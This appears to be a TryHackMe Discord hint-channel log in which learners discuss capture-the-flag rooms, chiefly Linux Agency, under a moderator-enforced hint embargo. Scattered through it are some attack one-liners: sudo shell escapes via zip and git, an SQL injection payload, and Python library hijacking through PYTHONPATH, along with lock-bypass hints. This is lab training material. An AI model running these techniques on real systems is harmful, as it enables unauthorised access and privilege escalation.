#room-hints
i was up til 4am last night doing random sudo and kernel exploits for user flag and nothing worked 🥲 I probably missed something
user.txt
i got the pass but ssh disabled for it and no home folder no entry in /etc/passwd
yeah...there's a bit of guessing involved
tried the pass for all user accounts in /etc/passwd
it's not on that machine exactly...
the creds you got should hint at something
the form of the creds
there's also an entry in the passwd file that'll hint a bit
Hello folks, I am currently on Linux:Local Enumeration and I am stuck...on SSH of all things (task 3). is there something not listed in the steps that I am missing? if anyone could kick me in the right direction I would greatly appreciate it.
the hint for that one looks like python reversing syntax so assumed it just meant CVE
what seems to be the issue?
seems clear to me
thanks for the response. im typing up my steps atm. i didnt want to write a wall of txt while you 2 were discussing lol.
- I have created the key pairs using key-gen on my attackbox...grab the contents of the id_rsa.pub and copied them into the authorized_key folder on the victim.
-I also had to run ssh-keygen on victim as the .ssh folder did not have an "authorized_keys" folder
-I also have the id_rsa of the box I am attacking saved to my attack desktop (with permissions 600)
-When running "ssh -i id_rsa manager@<boxIP>" i get to the password prompt... and then stuck
authorized_keys is a file
and I think you can use ssh-add to update that
I think you're trying too hard though
im sure you're right lol
@wicked bolt think about what creds exist for robert, there is obviously a service that can use those creds
problem is finding it
so about the auth_file...do i need to run "ssh-keygen" so that file appears? cause it was not there at first.. (or am I just going the wrong direction)
you can create it normally
or use ssh-add
unless there's no agent
you can create it manually
no need to run ssh-keygen
at least not on the victim box
though you could, then download the private key and use that
probably still needs the authorized_keys though
and i did try that as well (prob did it wrong but that was what I was going for lol). i added my attackbox id_rsa.pub to the newly created authorized_keys file....and then also copied the private key of the victim to my attack box and modified permissions to 600. then tried to login using the priv key but still no dice. o well. Ima keep bangin away.
can you screenshot the remote .ssh directory?
oh
yeah do one or the other, not both
either you use the attackbox ssh key, in that case you add its public key to authorized_keys
OR you generate a keypair on the target and use that private key
Hydra, I think I have potentially found something from 'ip route'. Cheers
that makes sense. ok im gonna start this section over. thank you for your help.
good hunting
i got it :D:D:D
huzzah!
and now the hint makes sense
root should be easy enough once you know what you're dealing with
nope, still doesn't never done anything on this particular product
the hint for user I mean
OH. YEP. now it makes sense after checking for some certain thing.
and i can imagine how to get root on the 'top level' from here but I'll have to do some research
there's a serious misconfiguration
need haaalpppp
@atomic marten just ask the question, please
mission 12 flag in linux agency.. Couldnt understand the hint
neither got the flag
ok
ya , on to root.txt now
Very weird. What is EVS though?
...got it first try this time. amazing how frustration just makes crap more difficult lol. thank you again @ripe hedge
haha yeah, taking a break helps sometimes
yeah what is it
a certain type of variable
got root on the main machine easily. But still that blue whale hint doesn't make sense. Oh well room done
check out the logo
GOT it thanks <3.
haha amazing yeah ok makes sense. I enjoyed the 'green indian bath soap' one i had to google it and try to find it. The hint is harder than the solution!
Did yal do linux agency in one day?
not sure how i didn't see any files related to that during my whole run through the machine. I feel like i have more of an understanding what's on that host than on my own
I did it in about 3-4 hours?
heh there's an entry in /etc/passwd
and a group
but none of the users can run it. Still not sure who the diane user is though
you mean the zerotier thing? I didn't make that link
i googled it but didn't understand it's for that
strange. It's not in /etc/passwd but is in /etc/group
should be user 127 or something
I wanted make sure i'm not going mad but defo not showing in passwd for me
I learned a lot from this room and it was very enjoyable!
Does anyone know what's up with the password hash pastebin-link in the Introduction to Django room? It's not necessary for any flags, so I was just wondering.
@ripe hedge you found the IP via a python script you said? so like a local nmap-like thing
wait you can just connect to a port on the same machine?
Hey guys I've been working on the Linux Agency room, but can someone explain what EVS is?
Oh lmao I was looking for what the acronym would stand for
I was stuck in the same question
You know what Is about 'send money to other country'
what do you do when you send something from one country to another
anyone knows how can I distract a snake ?
ooooh it's a snake(y) shell
haha good one.
gods I'm old
yep
half the people here weren't even born what that came out
I did not try it until mid 90es
Not sure about it .. maybe I package the thing in a box
wow it's been a while since the thm hash wasnt to be found in the rockyou list
think it like if you were a company. There is a name for that process. Also a word for getting things from other countries.
haha the money thing got me for a while but there might be a way to read what it wants from you
should be a way to read strings from a binary...
I wonder if the robert task is the obvious way or if I am overlooking something and just wasting time cracking hash
looking for a hint for overpass3 thanks
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
Please don't ask the same question across multiple channels like that
anyone is onto linuxagency ?,
half the people here
how to crack md5 of mission1 ? l have tried some solutions couldnt come up
hash looks hashcat m0 but couldnt come up
hashcat mode 0 is md5
Try online crackers for md5
You dont need to crack the hashes
Just provide the password in the md5 form itself.
hey where are u with the linux agency room ?
struggling with 26
but su mission1 and that hash wont giving authority
ah ok
use the whole flag as the pass
use the entire thing
thx
Like.. the entire flag
yeah .. it was mentioned in the text above the challenge
XD
@atomic marten may I ask you for a hint in the DM?
anyone in the priv esc section ?
sure man. But you have to send fren request to me too
need a little help with getting jordan ik what im supposed to do but no luck yet
probably the obvious way
ah hydra didnt wanna ping u
you don't
more snakes
yea yea ik what i gotta do
have fun
put it somewhere else then
the snakey path?
ohhh
there was a room somewhere that exploited this...
give me a sec
I think it was Wonderland
Please, no hints on Linux Agency for 72 hours. I know it shows as a Walkthrough room, but it is really a challenge room. The only reason it was changed to Walkthrough is to keep the amount of points for the room in-check. Remember, hints spoil it for people who like to complete the room without hints.
@hexed crescent As it is marked as a walkthrough room, I went under the impression it's a walkthrough, wasn't made clear.
Yeah, it's confusing. I pinned my message to make it more clear.
Not a spoiler or a hint on Linux Agency, but I'm on the struggle bus trying to get Dalia's password
Waaaa
You don't need it.
I need to try harder and smarter
Think like Agent 47.
yea im still stuck on jordan
What like, having depressing thoughts about being an orphan? Or being haunted by all the people I've killed? Or debating laser removal of the stupid barcode tattoo on the back of my head?
Think outside-the-box in order to survive.
haha that's a huge hint
That is not a stupid tattoo. It represents him.
what does "Send the money to another country" hint for bribe means?
It's a cryptic hint of what to do for the task.
yeah....you'll understand once you finish the task
If English is not your first language, it might be a bit harder than usual.
hydra can i DM ?
English is not my first language, is there a bit hint?
Anyone complete the ZeroLogon room? That was a fun little project
The modification of zerologon_test.py is very simple, once you have that correct you are 4 commands away from scoring a root Powershell in the domain controller
hey. when I get viktors flag then that means I get viktors password right? Similarly when I got dalia's password I am trying to change the user to dalia its showing that the password is wrong
Why?
I have been loggin in with their passwords since the last exercise
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
The linux agency room is still under hints embargo
what for?
Im playing linux agency
I am on mission22
Plz help me
Hint is
Sh!oot! we are surrounded by snakes and need a good way to escape from here...
Im stuck
Please check the pinned messages about that room
ok
thnx
i need help with a linux fundamentals 2, trying to find shiba3's password but dont know how to do it!!
What does the task say?
This challenge is pretty simple. The binary is checking to see if the environment variable "test1234" exists, and if it's set equal to the current $USER environment variable.
how do i find out if test1234 exists??
You don't
That's what the binary does
You need to make those checks pass
Create and set the variable
Run the binary
with touch command?
search more about how to declare env variables
maybe the information that the flags are not the user passwords in the privilege escalation part of the most recent room should also be pinned
Did u finish the room ?
nope
Any hints for mission 8 of Linux agency?
Not yet. Rule 13 applies
Can someone hint me about Mission8 in Linux Agency ?
I am working on it too
got it
so lets say I am in silvio's machine. I generate a ssh key and put the public one in silvio's authorized keys and I get the private key with the help of a python server, and I have set all correct permissions , then why cant I ssh into the machine as silvio???
It says the connection is refused by port 22
😦
Its very difficult because I cannot save my progress in anyway.. 😦
Check /etc/ssh/sshd_config. Only few users can login using SSH
So the privesc portion, I have to do without ssh??
Yes
Then I have to do all of them in one go. because the passwords arent the login passwords they are just flags
😦
@atomic marten @feral parrot @eager saffron You have all been made aware that rule 13 applies here. The next time will be a warning or a mute.
stuck on Linux Agency mission12 flag, hint "Maybe it is time to study some EVS", any more suggestions?
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
k
Please try your best in the 1st 72hours of the release of linux agency after that if you are unable to solve something I would be very grateful to help you
Are you the creator?
Yes Sir
Because if you are, you're free to override that policy if you want
No I am fine with the rule as its competitive for 1st 72 hours after that its just learning
Cool, ok
Btw did you attempt the room
Not yet
i attempts room @dim wasp
Dalia is being mean to me 😭
Nearly 48hours of try harder to all of you
@dim wasp i show you how i get the root?
Did you find any unintended routes?
@dim wasp i follow intended route because it was straightforward
didnt search for unintended
yes, was fun ty
yeah fun room but the hints are mostly confusing me more than helping
Thanks. I was losing my head over figuring the acronym out.
Deja vu
@dim wasp nicely made room i am almost completed ( or have i? ) onoto privsec stuff
Agreed. The dynamically changing file name is messing me up.
This is the room-hints channel. If you want to report something not working, please use the #room-bugs channel.
I used google...
https://tryhackme.com/room/linuxagency
jordans flag
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
@timid sequoia Not yet.
okok
i might have a couple, but i'd have to pm
mainly because i'm not sure if they're intended or not
Please read the pinned messages.
I get it
Physical Security Intro:
https://tryhackme.com/room/physicalsecurityintro
Task: 6
Question 3
It is not mentioned in the video but it is very common for cars. It can be pumped
Sparrows sell them
@dim wasp just completed the Linux Agency box. what a time machine ride, rewinds so many things. thanx man
Not sure if it has been 72h since its release, as it says the room is 18 days old. I am stuck on the last escalation to get root.txt, any hints on how to beat the blue whale?
18 days are when machine submitted on thm
It has not
Gotcha! I'll try harder
Not quite, 18 days was when they made the room, not uploaded anything or created a VM or submitted it
And thanks for clearing that up, I was often confused at newly released rooms showing age >0
Check in #announcements
Glad you enjoyed it
on sql injection 3,4
why do you have profileID=-1' or 1=1-- -
im confused about the minus one
the rest make sense
I think this is just a typo, is that give any positive result?
yeah
it gives positive results without -1
they both work
yeah its probably a typo
Try to debug the query if it makes any sense
Bruh
Someone uploaded linux agency walk through
On the net
Let the people play
I did the first part already Linux fundamentals
Was really fun playing it
found the query
SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID='-1' or 1=1-- -' AND pass...
it does make sense now
i see why the minus one doesn't make a difference
Thx
Just don't go looking for them
Just don't go looking for them
@stuck fractal
Yes sir
But still
It should be a fair game at least for some hours
Btw there's no fun seeing the solutions then solving
Yeah, except THM can't really police writeups
You're not allowed to post them in the discord unless they're approved on the site
Guys am not able to download sparky 2.8.3.(dkg) it's showing parallel read and NT_ something error in "Ra room" can anyone help me with that?
LINUX AGENCY : I got into r*(user.txt) and now i don't know what to do! any help?
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
Not yet.
okay
See rule 13
-warn @white salmon Please remember rule 13 and don't try to bypass it by telling people to DM you.
Warned helpme#7993
There is a pin...
@white salmon please don't ask the same question across multiple channels at the same time
Ok
I am stuck at mission24 in "Linux Agency" room. I have looked at dig, host and /etc/hosts but found nothing. Missing to understand the hint ( I guess it is related to regex or '{' but unable to relate how to use it). Can someone help?
i don't have any experience with cars used Google To search but wrong
It a kind of balloon - typically flat and black
jordan is killing me lol
There are loads of locksmith type blogs out there, dealing with getting into locked cars. They will mention something you can use to hold a door open (the 5 letter word) and advise you use this type (see Kim Schulz' hint - the 3 letter word) to avoid damage. Like using a balloon.
Please do not send writeups.
Ok sorry
another 24 hours before any hints/help can be provided on this room
no help/hints within 72 hours of it being released
@blazing thorn - thanks for the information, I was able to get past
hi i'm currently doing cyborg room and i have ||cracked the password for music_archive but i'm unable to go any further i tried ssh with same creds but it didn't work is there something i'm missing or should i look somewhere else?|| just give me a tiny nudge i will find the rest
||there should be a clue in the root directory of the archive I believe, it tells you the type of archive it is||
The clue might not be ||in the root of the archive, but you can find it if you dig a bit.||
yup, can't recall where exactly but it's there
actually i digged a bit and found ||some binaries and on running them the provide borg seg@?:not found which borg segment|| i will still keep digging to see if could find anything there and in other files
I think you're overthinking it a bit. ||Dig into the archive more. See if you can find something to read.||
Hi everyone I am currently on the SET Room, and having some issues ||capturing hashes when using the ZIP File|| can anyone give me a nudge or hint on what I am doing wrong?. Thanks!!
okay thanks i have checked it i didn't thought of ||trying to crack something in config as i wasn't getting anywhere i will look deep into it ||
never mind, found it
in room "Physical Security Intro" - (cool room btw) - I have tried a number of different things that could do this but not the expected answer;
The second answer for "An improperly hung door which opens away from you can be bypassed using this type of tool?"
- anyone who has done this got any hints? last question I can't get for this room.
Did you find this one or was that another thing?
no, I had another room question that I did work out only after posting haha
this one I did not find
Ok, it's ||something you can do to padlocks too|| that's quite a big hint
You're pulling the latch back from the strike plate, by sliding something in
Can I DM you @stuck fractal ?
I can't think of a way to say anything more without spoiling it and I'm about to grab food. I'm not sure DMing me would help that much
ok no problem, thank you I'll see what I can do
This question is repeated I guess and the first answer was something you can do to padlocks as well so I was just not sure if you were giving hints for the first copy of the question or second but I'll take the advice and see what else I can find
The most recent question you asked about improperly hung doors
yeah, there are two of the same question;
I had some ideas that even fit the lettering and were in the referenced video's but it didn't work, i'll keep digging
check Deviant's "resources" page, it's on there
same hint I got, helped me find it
will do, thank you!
wow I even knew this tool and had input it with 10 other forms but never heard it called that, thanks again
yup, was new to me too
"physical intro" must be the hardest room on THM.. took 2 months, average, I think.
much more if you are not english language native.
English language native, found it tough
Can I DM someone for the Set Room? Having some issues for the Hash Capture
having a bit of trouble with https://tryhackme.com/room/rpwebscanning Running into issues with this question as the answer I'm seeing seems to be wrong
Don't look too deep, you have a password and an archive....
dalia's flag is driving me crazy lol D:
Any tips on what could I look to continue the room internals ? I have managed to get the credentials to enter the wp-admin. Tried to find some vulnerabilities on wordpress, but they requiere me to install plugins which I can't seem to do, and I can't edit the ones already installed because I don't have permissions. Am I missing some vulnerability there ? Should I go for another route instead ?
Haven't done that room in particular but there's a generally reliable way of getting malicious code to execute with stock WP dashboard options
And you won't be able to install plug-ins unless you're compiling from source as vulnerable machines are not connected to the Internet
Alright! Thanks
finally did it 
Its php, so....there you have it! :)
@spare lagoon Rule 13 applies here, no help or hints yet
oh sorry, my bad
Thanks Alex, I will think about that when I come back to it.
Question has anyone attempted this CTF room: https://tryhackme.com/room/kuberneteschalltdi2020 and struggled with connecting with the kubeconfig command.
Hello all, i am doing Skynet, and I am at the point where i got into the squirrelmail inbox and got the Samba password for Miles. The run through says go into Miles share drive. His share drive says"NO ACCESS" when I smbmap it. I then try to smbclient //10.10.252.216/milesdyson to try and get into his share with the password that i got. says tree connect failed: NT_STATUS_ACCESS_DENIED
Anyone know how i can get into the share drive?
Hi, please help, I'm really stuck at physical intro room. Exactly at hardware bypassing. Question 3, 5 and last. I have been searching for hours
@light phoenix Please only post in one channel.
sorry 😦
Screenshot
Notice how it says Workgroup\root's password?
You're not specifying a username
ok thought it was in the syntax
No
my machine just shut down, gonna be aloser and finish this tomorrow
That's the share name
so
smbclient //10.10.252.216/milesdyson -u milesdyson
?
when i tried that, it said the same NT_STATUS_ACCESS_DENIED
didn't ask for my password
-U
It's case sensitive as the other person said
As in case matters
any subtle hints for cyborg, ive got the info for ||squidproxy and the password|| not sure what to use it for, not familiar with this proxy, have tried triggering basic auth via port ||3128||could i get a push in the right direction? gracias
you should look at cy"borg"
Anyone able to give me a little nudge with Year Of The Rabbit room? I have made it up to the point where ||I found the ftp account and have got Eli's_Creds.txt, I have thrown the file into cyberchef with some common operations and nothing came of it, I have also removed everything but the .- characters to see if it was morse code hidden in there and that gave me nothing|| Don't really know where to go from here, cheers!
Any hint on Silvio's flag in the room Linux Agency
@white salmon i think no help or hints, rule 13
Yah, that's correct. Although I believe it's 7pm (GMT) tonight when hints are ok
So confused as to what I need to do, there's nothing inside that file
the binary checks the conditions mentioned so you need to fulfill them
yea the second part of instructions mentions what you need to do
Yea I got it. Ended up looking at a walkthrough, but I do understand it so that's good!
Hint for linux agency mission4
@devout tangle
Oh Thanks
Did you find ||the page with the chat on it?|| That tells you what to look for. Or you could look around the website, see if you can ||download || anything.
can we ask hints on Linux agency now?
@flat dawn 72hrs isn't over yet
allright
0day room, I am having trouble compiling the ||kernel exploit|| , following error stops me ||gcc: error trying to exec 'cc1': execvp: No such file or directory||. Anybody else had this problem?
hi all, in the nmap section - task 14 "practical" what is the target ip address?
I saw the ||cc1|| file exists on ||/usr/lib/gcc/x86_64-linux-gnu/4.8/||. Tried adding it to the PATH but same result
||/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.:/usr/lib/gcc/x86_64-linux-gnu/4.8/|| Srry, edit
@lunar pulsar Room-hints is for people who want a nudge, please avoid suggesting write ups in this chat :)
can I pm anyone about Keldagrim, just have one or two questions
No asking for hints on that one @storm venture The room is brand new.
Ahh right, my bad
Linux Fundamentals Part 2, Task 11
I have both ||$USER|| and ||$test1234|| set as ||shiba2|| but when I try to access the ||shiba2 binary|| it says ||cat: /etc/shiba/shiba3: permission denied||
is there something I'm missing here
I do have to leave for work soon so I'd really appreciate it if I can get a hint or two soon
can u use sudo?
nop
for the record I have done ||export test1234=$USER||, which seems to be the solution I've found through searching the channels
but $USER is not set to anything
so i don't think using export test1234=$USER would do anything
I ssh'd in using putty
i can't even understand what's going on
what am i supposed to do?
what is manpreet108 typing?
dang dude chill
Hi Everyone
I am new in this group and recently join Tryhackme . I am doing practice on buffer overflow and unable to get reverseshell
I am able to find offset value, badchar, ESP JMP value and return address and open local port on machine and at the end when i generate reverse_shell and run exploit .Again oscp.exe application crash but not getting reverse shell.
I go through all youtube videos and websites and doing same process but unable to figure out what is wrong .
So Please Please advise as i am stuck on this from few days . plsssssssss
i'm chilling already
im gonna try terminating and relaunching the machine and see if that fixes my issue
case sensitivity might be your issue
ok apparently restarting the machine fixed the issue
that was a weird one
I had the solution right but for whatever reason it wouldnt work ¯\_(ツ)_/¯
could anyone possible answer a question regarding the Windows PrivEsc Room?
its in regards to the rogue potato method of obtaining system, it keeps making reference to the same binary for popping a shell, but it wants me to execute that binary while already in a shell created by that binary, so the ports in use
seems to me I would need a second binary configured to a second port, is this correct?
@white salmon please don't ask the same question across multiple channels
Hey guys , any hint about " how install custom lib in Python " ? ๐
@midnight spindle what room?
phew, finaly root on linux agency - its was hard - I learned so much - big thanks to the guys who made this room
Linux Agency still under rule13?
@stuck fractal I THINK it will be usefull for Linux agency ^^
ok
@dim wasp Hey, man, your linuxagency room was AWESOME. Felt like a CTF.
learnt some new stuff from Linux Agency and built up on basics xD but still stucked at last flag
hey all, hope you are all well.
i am a little bit stuck on the Linux fundamental 2 room where you have to log in to putty with the shiba2 account, when i go to log in it says that my connection has timed out. Has anyone else had this issue?
Are you connected to the vpn?
nope, haha can tell i am new to this, that worked thank you very much.
Still stuck on the Adams Rite bypass. Have been down the knight rabbit hole. Believe that I could now speak well to how knights fought, what they wore and siege tactics. Feel like I am coming at this from the wrong direction.
Something they hold
Also used by spacecraft to protect against heat, something similar to protect against radiation
Nope you're in completely the right area. The catch is that the question is looking for what you might call the activity rather than the thing. So if you put a block in, you would be blocking...
can someone please give me a hint for user.txt in linux agency??
'Activity' is what worked. Cheers!
ok
SQL Injection Lab Task 3 help ?
@kind bear this is the room hints channel
thank you rooted your hint helped me alot
@dim wasp and @hollow swan : thanks a lot for the linux agency room ! It'was really nice !!
@midnight spindle glad you enjoyed our room
good job @hollow swan and @dim wasp on the linux agency room
I'm now stuck at sean flag, but really fun so far.
Can you help me with silvio's flag?, I'm stucked there since yesterday and cant't figure out what I'm missing..... Thank a lot in advance!
@white salmon did you already got dalia's shell
yes
hey guys, I am trying brainpan room and i'm a bit stuck after gaining a shell. After running linpeas there is sth that ||can be executable with sudo /home/anansi/bin/anansi_util||. Am I in the correct path or should I look elsewhere?
Then check if you find something interesting with ||sudo -l||
thanks man, I'll check it!
Linux agency bludit Kills me. Mission 1 to 29, easy. But 30 i have no idea 😩
No PHP on the server. The hint doesnt Help.
the hint is kinda misleading try the looking for the flag in the default linux files in the users dir
can someone give me a hint? (Theseus room the first question ) After decoding that message in the main page it`s telling about key, but what key?
if im not mistaking
@balmy verge thx. Will have a look
Any hint on sean flag for linuxagency room would be appreciated
what group is he a part of ? and what perms does the group give him ??
thx
In the Linux Agency Room:Jordan, should I be able to read the file (ls -lah suggests not). I'm looking at ||python hijacking|| as suggested by others, but these seem to need me to know what ||modules are being imported, and then poison those based on the Python search order||.
PYTHONPATH
look it up
Yes I'm seeing examples of that, but don't I need to know ||what modules the Gun-Shop.py|| script is importing?
if u run sudo -l u || can run the script as jordan and when u run it u'll see a python error which tells u the name ||
can someone help my man
Thanks, will check this out now.
I am not seeing any python specific errors unless I'm misinterpreting them
||sudo -u jordan /opt/scripts/Gun-Shop.py
sudo: unable to open audit system: Permission denied
sudo: pam_open_session: System error
sudo: policy plugin failed session initialization
||
Python not my strongest point so that is going to be an issue
yes that was a weird error someone else dm'd me had, i didnt have that error tho
can i dm
ofc
can anybody offer a hint for linuxagency mission4 flag
Pretty sure hints are banned for that room
the hint in the task is really helpful || maybe u are too feline "CAT" ||
Hi guys, can someone help on linux agency room at dalia's flag?
Got Dalia or trying to get Dalia?
trying to get dalia
Tick tock...
You've got it then
You have 30 seconds to modify it before it gets executed and mashed again. Tick tock.
yeah the hint is not helping too much i understand the hint just not finding the file the user can read
Are you in the right place?
try reading the file with something other than cat
I need to change it right after it change? I think I am doing that
There's a watch command that may be useful
date is helpful too
ohhhh ok got it thanks
I kept Ctrl+O to be sure
watch cat scriptname.sh
I'm still struggling with this - trying to follow another tutorial to simply output whoami, but still getting the same error.
You're trying too hard
😦 getting that error too @solar needle
Why pam_open_session?
Seems to be the function that's being called?
unsure, I get that without even trying python hijacking
it's giving some ppl a weird error when they try to run the script with sudo
Yeah but they're overthinking it too
Lib they're using seems broken
You want to hijack the Lib call
Actually is there any problem with user4?
@ripe hedge I can't get to the lib call stage
I tried but failed to import shop
Make sure the path is readable by jordan
How
So did I
It worked?
But I changed the access rights first
I'm only seeing this error. Could this be why I can't solve this user?
Chown then right?
I'm using /tmp as it's writable by everyone I think
Chmod is sufficient
Chmod 777
Sure it's overkill but sure
i didnt face this error just a python error specifying the missing module
yup, used that
and it worked for me
I'm not seeing a missing module error
yea dont know why some people get that error
@ripe hedge ok export PYTHONPATH=/home/reza and then place shop.py there and chmod 777 and just run it ok
You'll need to set the path for Jordan in the sudo command
Anything unusual in my current env?
||LS_COLORS=
LANG=en_US.UTF-8
LESS=-ix8RmPm Manual page git-config(1) ?ltline %lt?L/%L.:byte %bB?s/%s..?e (END):?pB %pB%.. (press h for help or q to quit)$PM Manual page git-config(1) ?ltline %lt?L/%L.:byte %bB?s/%s..?e (END):?pB %pB%.. (press h for help or q to quit)$
SUDO_GID=1033
OLDPWD=/home/reza/tmp
USERNAME=reza
USER=reza
MAN_NO_LOCALE_WARNING=1
PWD=/home/reza
HOME=/home/reza
SUDO_USER=reza
MAN_ORIG_LESS=
GIT_PREFIX=
SUDO_UID=1033
MAIL=/var/mail/reza
TERM=unknown
SHELL=/bin/bash
MAN_PN=git-config(1)
SUID_UID=1033
PYTHONDONTWRITEBYTECODE=1
SHLVL=2
MANPATH=/usr/share/man:
LESSCHARSET=utf-8
LOGNAME=reza
PATH=/usr/lib/git-core:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
_=/usr/bin/env||
I don't know that shop is the missing module because running with Jordan returns the following error only
Do you have a proper shell?
Import tty i guess
/dev/tty
I usually do the export TERM=xterm
And then stty raw -echo;fg
But it's not stabilising this shell
I cant find what to add in the file right now so I will leave it for another time to clear my head.. Thanks for the help though!!
check crontab file
He got that part
Try python3 import pty method to import tty
That's how I got all my shells so far
And pty.spawn etc
Yes I can't figure out what code should i add in the script
Happy to help, feel free to give me a buzz
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ this article always helps me with stabilizing shells
How would one get a shell from a user without a key or password...
Some people are listening ;)
I've done this and am still getting the unhelpful Python error.
same
It's probably something easy, but my mind is frozen right now xD
hey say Im on user3 and my shell dies then I have to start again from user1 bz thats what im doing
maybe its different python version ?
Sometimes I wish my cat could go on the Internet …
The python in the sudo command is the correct one
Meow
Cats don't go backwards very easily though
If I specify the version it prompts me for the password.
Yeah cause it's not the command you're allowed to run
Exactly. But when I run it exactly, it generates an error without the shop module other people are seeing. Hmmm
@solar needle how have you moved from user to user from viktor to this stage? I think we may be doing something incorrect along those lines
I'm responding to this a couple weeks late..but as far as I can tell-- you don't actually find the version. I think folks just know what the vulnerability is, and just use the exploit that they know is going to work. I haven't been able to find the version anywhere
Hope you took notes and reset the VM?
yup, have notes
@cold oracle When you're logged in it's on the dashboard
I've been getting the same error for 2 days, and have deployed around 4 times now.
If you're not logged in, you don't see it
Might be how you're getting your shell then
thanks, i thought enumeration would find that. scratchin ma brain a lil bit
technically version numbers can be considered excessive information
So from Viktor || I'm using a bash reverse shell to get to Dalia. From Dalia I used a standard GTFOBIN to spawn /bin/bash, and the same again for git||
OWASP recommends against sending any more information than you need because version numbers let attackers search for exploits easily
yea i was looking through writeups...lol and nobody mentioned that
Sounds right
I mean, there aren't 45 different exploits, so I figured they just guessed the exploit and the version
I'm giving up for the day - will try again tomorrow 😭
what git route did people take for ||silvio to reza|| ?
Var
One sec
ty
A
thanks @ripe hedge
I am no longer getting the error when running the python script now
I was using (b) originally for git
very strange... onwards!
On linuxagency ||what do you do with roberts ssh key? I got the passphrase but I can't figure out what I'm supposed to do with that info ||
@verbal flume I'm working on the same task, no luck so far
What does one normally do with an ssh key?
||SSH into a host, I'm not sure which host I'm supposed to use.||
||There is a ssh server listening locally ||
Try them all
||At localhost?||
Also look around. I'm told it's possible without a script
||ss -aln ||
||I wrote a port scanner...||
ok, have made it to sean 🥳
@manic citrus thanks for the tips
||Is it port 2222||
yes
I'm already in, now time to find the user.txt file
||Do I need to overwrite id_rsa.pub, I tried just moving it and using the passphrase for id_rsa, but that defaults me to robert's pw||
On the root.txt
||No you do not need to overwrite it ||
@solar needle how /tmp worked for u I tried but same no module name shop
I've given up for today
Have you created a module ?
I think my shell is kaput
|| are you specifying PYTHONPATH in the CLI when calling the script, or actually updating the PYTHONPATH? And if the latter, wouldn't that just change the PYTHONPATH for reza, rather than Jordan?||
Export pythonpath=/tmp
||Ok SETENV: is set in the sudo config. So you can add environment variables to the sudo command for eg sudo PYTHONPATH=/tmp -u username command||
|| Thanks for all the help, right now when I enter the passphrase follows up with asking for the PW. I've chmodded id_rsa to 400 so it's not that. When I enter the wrong pw it doesn't ask for the password ||
This user has given me such a hard time lol
||As maya I ran ssh -i old_robert_ssh/id_rsa robert@127.0.0.1:2222 ||
||Do you move the id_rsa.pub?||
||nope||
ok, got sean flag
||I'm logged in as maya at ~ and when I run "ssh -i old_robert_ssh/id_rsa robert@127.0.0.1:2222" I get cannot resolve hostname, when I run "ssh -i old_robert_ssh/id_rsa robert@127.0.0.1 -p 2222" I get asked for robert's pw. I haven't done the other parts of the challenge on this machine, I logged in as agent47 then went straight to maya since I got stuck here last night(just letting you know if that might be where the issue is)||
||my bad its -p 2222 not :2222 the password is the passphrase ........ password re-use ||
D'oh, I always give up too quick
also thanks
@manic citrus thanks it worked
SETENV perm means i can set environ variable direct from sudo -u ...right?
@verbal flume Mallow as in Mallow in Cork... ?
Nope
kk
Np
Yeah it's a sudo misconfiguration to allow it
@manic citrus got ken as well
Any luck so far?
Not, I found ||docker binary at /tmp|| but not sure what to do with it.
||there is another exploit needed to privesc to find user.txt ||
any tips for priv esc to penelope?
|| Do you have the Sean flag? ||
yup
|| There's something on the same line as it. Take a look||
that one had me scratching my head for 2 days lol
I feel completely exhausted with Linux Agency - the gunshop script is not returning the same error as everyone else is seeing
I'm using AttackBox
haha, has me wrecked
I've rebooted the machine 5 times now at least.
@solar needle what are the exact priv esc methods you are using? I got some help earlier and I am no longer seeing them
||Im using TF=$(mktemp -u) zip $TF /etc/hosts -T -TT 'sh #' to get to Dalia. Then I'm using git help config !/bin/sh to get to Reza||
ok, don't use that git method
use (a) for git on GTFO
sudo -u USER and then the command from GTFO
that's where I was going wrong
worked for me then
a has never worked for me
try again
But if it gives me a shell why should it stop me progressing?
no idea
I used (b) under sudo
interesting
I used (b) and had issues
perhaps it's a red herring
but I went with (a) and it's working now
have worked through several other users since
This is what I keep getting, even before continuing
|| reza@linuxagency:/home/reza$ sudo -u jordan /opt/scripts/Gun-Shop.py
sudo: unable to open audit system: Permission denied
sudo: pam_open_session: System error
sudo: policy plugin failed session initialization||
that's the exact error I was getting
When I used a, it kept asking me for a password.
||sudo -u reza PAGER='sh -c "exec sh 0<&1"' git -p help||
||I used method e||
no
I wonder whether it's an AttackBox issue
what is this ||base64|| file for?
|| Penelope?||
